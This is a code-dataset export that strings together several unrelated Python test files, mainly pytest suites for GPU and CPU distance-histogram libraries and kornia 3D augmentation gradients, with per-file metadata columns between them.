histo_tri = cudh.histograms(coords, r_max, n_bins, box=box_tri, force_triclinic=True,
precision=precision, check_input=check_input, algorithm=algo)
util.compare(histo_ort, histo_tri)
testcase_small_invalid = None
@pytest.fixture
def fixture_small_invalid():
global testcase_small_invalid
if testcase_small_invalid is None:
n_atoms = [2000, 1000]
n_bins = 1000
coords = util.generate_random_coordinate_set(n_atoms, blowup_factor=3.14)
histo_ref = None
testcase_small_invalid = (n_atoms, n_bins, coords, histo_ref)
return testcase_small_invalid
if TEST_PYDH:
def test_pydh_invalid_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=1, check_input=True)
def test_pydh_invalid_threads_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for nt in n_threads:
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=nt, check_input=True)
def test_pydh_invalid_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=1, check_input=True)
def test_pydh_invalid_threads_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for nt in n_threads:
with pytest.raises(ValueError):
pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt, check_input=True)
if TEST_CUDH:
def test_cudh_invalid_small_double(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for gpu_id in range(cudh.get_num_devices()):
with pytest.raises(ValueError):
cudh.histograms(coords, r_max, n_bins, precision="double", gpu_id=gpu_id, check_input=True)
def test_cudh_invalid_small_single(fixture_small_invalid):
n_atoms, n_bins, coords, histo_ref = fixture_small_invalid
for gpu_id in range(cudh.get_num_devices()):
with pytest.raises(ValueError):
cudh.histograms(coords, r_max, n_bins, precision="single", gpu_id=gpu_id, check_input=True)
testcase_medium = None
@pytest.fixture
def fixture_medium():
global testcase_medium
if testcase_medium is None:
n_atoms = [3000, 1000, 5000, 3500]
n_bins = 8192
coords = util.generate_random_coordinate_set(n_atoms)
histo_ref = dist.histograms(coords, r_max, n_bins)
testcase_medium = (n_atoms, n_bins, coords, histo_ref)
return testcase_medium
if TEST_PYDH:
def test_pydh_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_masked_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
mask_array = np.ones(n_el * (n_el + 1) // 2)
mask_array[::2] = 0
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, mask_array=mask_array, check_input=check_input)
col_sum = histo_pydh.sum(axis=0)
assert(np.sum(col_sum[1::2]) == 0)
def test_pydh_medium_scaled_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
scale_factors = np.ones(n_el * (n_el + 1) // 2)
scale_factors *= 0.5
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, scale_factors=scale_factors, check_input=check_input)
assert(histo_ref.sum() == 2.0 * histo_pydh.sum())
if TEST_CUDH:
def test_cudh_medium_double(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_masked_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
mask_array = np.ones(n_el * (n_el + 1) / 2)
mask_array[::2] = 0
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, mask_array=mask_array, check_input=check_input, algorithm=algo)
col_sum = histo_cudh.sum(axis=0)
assert(np.sum(col_sum[1::2]) == 0)
def test_cudh_medium_scaled_single(fixture_medium):
n_atoms, n_bins, coords, histo_ref = fixture_medium
n_el = len(n_atoms)
scale_factors = np.ones(n_el * (n_el + 1) / 2)
scale_factors *= 0.5
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single", gpu_id=gpu_id,
scale_factors=scale_factors, check_input=check_input, algorithm=algo)
assert(histo_ref.sum() == 2.0 * histo_cudh.sum())
# test case designed to select the simple kernels in cudh
testcase_medium_manybins = None
@pytest.fixture
def fixture_medium_manybins():
global testcase_medium_manybins
if testcase_medium_manybins is None:
n_atoms = [3000, 5000, 3500]
n_bins = 68000
coords = util.generate_random_coordinate_set(n_atoms)
histo_ref = dist.histograms(coords, r_max, n_bins)
testcase_medium_manybins = (n_atoms, n_bins, coords, histo_ref)
return testcase_medium_manybins
if TEST_PYDH:
def test_pydh_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_pydh_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=1, check_input=check_input)
util.compare(histo_ref, histo_pydh)
def test_n_threads_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single",
n_threads=nt, check_input=check_input)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_medium_manybins_double(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_medium_manybins_single(fixture_medium_manybins):
n_atoms, n_bins, coords, histo_ref = fixture_medium_manybins
for check_input in [True, False]:
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, check_input=check_input, algorithm=algo)
util.compare(histo_ref, histo_cudh)
if TEST_LARGE:
testcase_large = None
@pytest.fixture
def fixture_large():
global testcase_large
if testcase_large is None:
n_atoms = [105000, 110000, 133000]
n_bins = 16000
coords = util.generate_random_coordinate_set(n_atoms)
# --- note that we use pydh to generate the test dataset
histo_ref = pydh.histograms(coords, r_max, n_bins, precision="double", n_threads=n_threads[-1])
testcase_large = (n_atoms, n_bins, coords, histo_ref)
return testcase_large
if TEST_PYDH:
def test_pydh_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=1)
util.compare(histo_ref, histo_pydh)
def test_n_threads_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_large_double(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_large_single(fixture_large):
n_atoms, n_bins, coords, histo_ref = fixture_large
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
if TEST_XLARGE:
testcase_xlarge = None
@pytest.fixture
def fixture_xlarge():
global testcase_xlarge
if testcase_xlarge is None:
n_atoms = [250000, 275000, 225000]
n_bins = 18000
coords = util.generate_random_coordinate_set(n_atoms)
# --- note that we use pydh to generate the test dataset, max number of threads and no blocking
histo_ref = pydh.histograms(coords, r_max, n_bins, precision="double",
n_threads=n_threads[-1], blocksize=-1)
testcase_xlarge = (n_atoms, n_bins, coords, histo_ref)
return testcase_xlarge
if TEST_PYDH:
def test_n_threads_xlarge_single(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for nt in n_threads:
histo_pydh = pydh.histograms(coords, r_max, n_bins, precision="single", n_threads=nt)
util.compare(histo_ref, histo_pydh)
if TEST_CUDH:
def test_cudh_xlarge_double(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="double",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
def test_cudh_xlarge_single(fixture_xlarge):
n_atoms, n_bins, coords, histo_ref = fixture_xlarge
for gpu_id in range(cudh.get_num_devices()):
for algo in [1, 2, 3]:
histo_cudh = cudh.histograms(coords, r_max, n_bins, precision="single",
gpu_id=gpu_id, algorithm=algo)
util.compare(histo_ref, histo_cudh)
| 45.180135 | 127 | 0.63215 | 3,553 | 26,837 | 4.469181 | 0.074866 | 0.034637 | 0.016374 | 0.029473 | 0.817747 | 0.804459 | 0.770452 | 0.747276 | 0.734177 | 0.716607 | 0 | 0.015398 | 0.281291 | 26,837 | 593 | 128 | 45.256324 | 0.80786 | 0.088795 | 0 | 0.5898 | 0 | 0 | 0.021198 | 0 | 0 | 0 | 0 | 0 | 0.008869 | 1 | 0.117517 | false | 0 | 0.033259 | 0 | 0.175166 | 0.013304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
534b34820a671b7126cecbafe18c76ed51f7556e | 283 | py | Python | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | src/SocialNetwork_API/services/__init__.py | mungpham/mungpham | 3545dafdb498503d2f138d4b7515a7ae8f195994 | [
"MIT"
] | null | null | null | from SocialNetwork_API.services.post import PostService
from SocialNetwork_API.services.comment import CommentService
from SocialNetwork_API.services.data import DataService
from SocialNetwork_API.services.user import UserService
from SocialNetwork_API.services.api import ApiService | 56.6 | 61 | 0.897527 | 35 | 283 | 7.114286 | 0.4 | 0.341365 | 0.401606 | 0.562249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067138 | 283 | 5 | 62 | 56.6 | 0.943182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5366f1fb352e39c51dff6b33255ff547b09e1df7 | 13 | py | Python | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | 24 | 2022-01-06T20:26:42.000Z | 2022-02-18T07:56:44.000Z | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | null | null | null | test/test_decl.py | HouQiming/ama | b7dddb425892e1d4d95312b330061911489e242b | [
"BSD-2-Clause"
] | 4 | 2022-01-06T20:26:44.000Z | 2022-01-14T06:59:48.000Z | a,b,c=(d,e,)
| 6.5 | 12 | 0.384615 | 5 | 13 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 13 | 1 | 13 | 13 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7280c58790fb8e1a2e8d46cf1a85d45f3222d323 | 14,415 | py | Python | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 4,894 | 2019-10-24T15:51:39.000Z | 2022-03-30T22:58:33.000Z | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 912 | 2019-10-24T16:08:42.000Z | 2022-03-31T19:07:09.000Z | test/augmentation/test_backward_3d.py | AK391/kornia | a2535eb7593ee2fed94d23cc720804a16f9f0e7e | [
"ECL-2.0",
"Apache-2.0"
] | 557 | 2019-10-24T16:02:43.000Z | 2022-03-28T07:33:33.000Z | import pytest
import torch
import torch.nn as nn
from kornia.augmentation import RandomAffine3D, RandomMotionBlur3D, RandomPerspective3D, RandomRotation3D
class TestRandomAffine3DBackward:
@pytest.mark.parametrize(
"degrees",
[
10,
[10.0, 20.0],
[10.0, 20.0, 30.0],
[(10, 20), (10, 20), (10, 20)],
torch.tensor(10.0),
torch.tensor([10.0, 20.0]),
torch.tensor([10, 20, 30]),
torch.tensor([(10, 20), (10, 20), (10, 20)]),
],
)
@pytest.mark.parametrize("translate", [[0.1, 0.2, 0.3], torch.tensor([0.1, 0.2, 0.3])])
@pytest.mark.parametrize(
"scale",
[
[0.1, 0.2],
[(0.1, 0.2), (0.1, 0.2), (0.1, 0.2)],
torch.tensor([0.1, 0.2]),
torch.tensor([(0.1, 0.2), (0.1, 0.2), (0.1, 0.2)]),
],
)
@pytest.mark.parametrize(
"shear",
[
10.0,
[10.0, 20.0],
[10.0, 20.0, 30.0, 40.0, 50.0, 60.0],
[(-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0)],
torch.tensor(10),
torch.tensor([10, 20]),
torch.tensor([10.0, 20.0, 30.0, 40.0, 50.0, 60.0]),
torch.tensor([(-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0), (-10.0, 10.0)]),
],
)
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(
self, degrees, translate, scale, shear, resample, align_corners, return_transform, same_on_batch, device, dtype
):
_degrees = (
degrees
if isinstance(degrees, (int, float, list, tuple))
else nn.Parameter(degrees.clone().to(device=device, dtype=dtype))
)
_translate = (
translate
if isinstance(translate, (int, float, list, tuple))
else nn.Parameter(translate.clone().to(device=device, dtype=dtype))
)
_scale = (
scale
if isinstance(scale, (int, float, list, tuple))
else nn.Parameter(scale.clone().to(device=device, dtype=dtype))
)
_shear = (
shear
if isinstance(shear, (int, float, list, tuple))
else nn.Parameter(shear.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomAffine3D(
_degrees,
_translate,
_scale,
_shear,
resample,
align_corners=align_corners,
return_transform=return_transform,
same_on_batch=same_on_batch,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(degrees, (int, float, list, tuple)):
assert isinstance(aug.degrees, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.degrees.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.degrees._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() == 0
else:
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() != 0
if not isinstance(translate, (int, float, list, tuple)):
assert isinstance(aug.translate, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.translate.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.translate._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (translate.to(device=device, dtype=dtype) - aug.translate.data).sum() == 0
else:
assert (translate.to(device=device, dtype=dtype) - aug.translate.data).sum() != 0
if not isinstance(scale, (int, float, list, tuple)):
assert isinstance(aug.scale, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.scale.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.scale._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (scale.to(device=device, dtype=dtype) - aug.scale.data).sum() == 0
else:
assert (scale.to(device=device, dtype=dtype) - aug.scale.data).sum() != 0
if not isinstance(shear, (int, float, list, tuple)):
assert isinstance(aug.shears, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.shears.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.shears._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (shear.to(device=device, dtype=dtype) - aug.shears.data).sum() == 0
else:
assert (shear.to(device=device, dtype=dtype) - aug.shears.data).sum() != 0
class TestRandomRotation3DBackward:
@pytest.mark.parametrize(
"degrees",
[
10,
[10.0, 20.0],
[10.0, 20.0, 30.0],
[(10, 20), (10, 20), (10, 20)],
torch.tensor(10.0),
torch.tensor([10.0, 20.0]),
torch.tensor([10, 20, 30]),
torch.tensor([(10, 20), (10, 20), (10, 20)]),
],
)
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, degrees, resample, align_corners, return_transform, same_on_batch, device, dtype):
_degrees = (
degrees
if isinstance(degrees, (int, float, list, tuple))
else nn.Parameter(degrees.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomRotation3D(
_degrees,
resample,
align_corners=align_corners,
return_transform=return_transform,
same_on_batch=same_on_batch,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(degrees, (int, float, list, tuple)):
assert isinstance(aug.degrees, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.degrees.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.degrees._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() == 0
else:
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() != 0
class TestRandomPerspective3DBackward:
@pytest.mark.parametrize("distortion_scale", [0.5, torch.tensor(0.5)])
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, distortion_scale, resample, align_corners, return_transform, same_on_batch, device, dtype):
_distortion_scale = (
distortion_scale
if isinstance(distortion_scale, (float, int))
else nn.Parameter(distortion_scale.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomPerspective3D(
_distortion_scale,
resample=resample,
return_transform=return_transform,
same_on_batch=same_on_batch,
align_corners=align_corners,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(distortion_scale, (float, int)):
assert isinstance(aug.distortion_scale, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.distortion_scale.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.distortion_scale._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (distortion_scale.to(device=device, dtype=dtype) - aug.distortion_scale.data).sum() == 0
else:
assert (distortion_scale.to(device=device, dtype=dtype) - aug.distortion_scale.data).sum() != 0
class TestRandomMotionBlur3DBackward:
@pytest.mark.parametrize("angle", [20.0, torch.tensor(20.0), torch.tensor([20.0])])
@pytest.mark.parametrize("direction", [[-0.5, 0.5], torch.tensor([-0.5, 0.5])])
# 'reflect' is not implemented by torch.
@pytest.mark.parametrize("border_type", ['constant', 'replicate', 'circular'])
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, angle, direction, border_type, resample, return_transform, same_on_batch, device, dtype):
_angle = (
angle
if isinstance(angle, (float, int, list, tuple))
else nn.Parameter(angle.clone().to(device=device, dtype=dtype))
)
_direction = (
direction
if isinstance(direction, (list, tuple))
else nn.Parameter(direction.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomMotionBlur3D(
(3, 3), _angle, _direction, border_type, resample, return_transform, same_on_batch, p=1.0
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(angle, (float, int, list, tuple)):
assert isinstance(aug.angle, torch.Tensor)
if resample == 'nearest' and aug.angle.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.angle._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (angle.to(device=device, dtype=dtype) - aug.angle.data).sum() == 0
else:
# Assert if param not updated
assert (angle.to(device=device, dtype=dtype) - aug.angle.data).sum() != 0
if not isinstance(direction, (list, tuple)):
assert isinstance(aug.direction, torch.Tensor)
if torch.all(aug.direction._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (direction.to(device=device, dtype=dtype) - aug.direction.data).sum() == 0
else:
# Assert if param not updated
assert (direction.to(device=device, dtype=dtype) - aug.direction.data).sum() != 0
| 44.490741 | 119 | 0.568574 | 1,768 | 14,415 | 4.555995 | 0.07862 | 0.013408 | 0.059094 | 0.076474 | 0.872998 | 0.848417 | 0.807325 | 0.768219 | 0.768219 | 0.768219 | 0 | 0.048411 | 0.299272 | 14,415 | 323 | 120 | 44.628483 | 0.749035 | 0.139785 | 0 | 0.538168 | 0 | 0 | 0.03366 | 0 | 0 | 0 | 0 | 0.003096 | 0.091603 | 1 | 0.015267 | false | 0.026718 | 0.015267 | 0 | 0.045802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7284770cd247df113056a7b89d2f67382307ca4a | 35,461 | py | Python | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | import unittest
from datetime import timedelta
import mock
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from cradmin_legacy import cradmin_testhelpers
from cradmin_legacy.crinstance import reverse_cradmin_url
from model_bakery import baker
from devilry.apps.core import devilry_core_baker_factories as core_baker
from devilry.apps.core.models import Assignment
from devilry.devilry_account.models import PermissionGroup
from devilry.devilry_admin.views.assignment import overview
from devilry.utils.datetimeutils import default_timezone_datetime
class TestOverviewApp(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_title(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end',
short_name="testassignment",
parentnode__short_name="testperiod", # Period
parentnode__parentnode__short_name="testsubject" # Subject
)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('title').alltext_normalized,
'testsubject.testperiod.testassignment')
def test_devilry_admin_assignment_edit_long_name(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('#devilry_admin_assignment_edit_long_name').alltext_normalized,
'Edit name')
def test_h1(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end', long_name="TESTASSIGNMENT")
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('h1').alltext_normalized, 'TESTASSIGNMENT')
# Todo: Remove
# def test_publish_now_info_box(self):
# assignment = baker.make('core.Assignment', publishing_time=timezone.now() + timedelta(days=1))
# group = baker.make('core.AssignmentGroup', parentnode=assignment)
# core_baker.candidate(group=group)
# core_baker.examiner(group=group)
# baker.make('core.RelatedStudent', period=assignment.period)
# baker.make('core.RelatedExaminer', period=assignment.period)
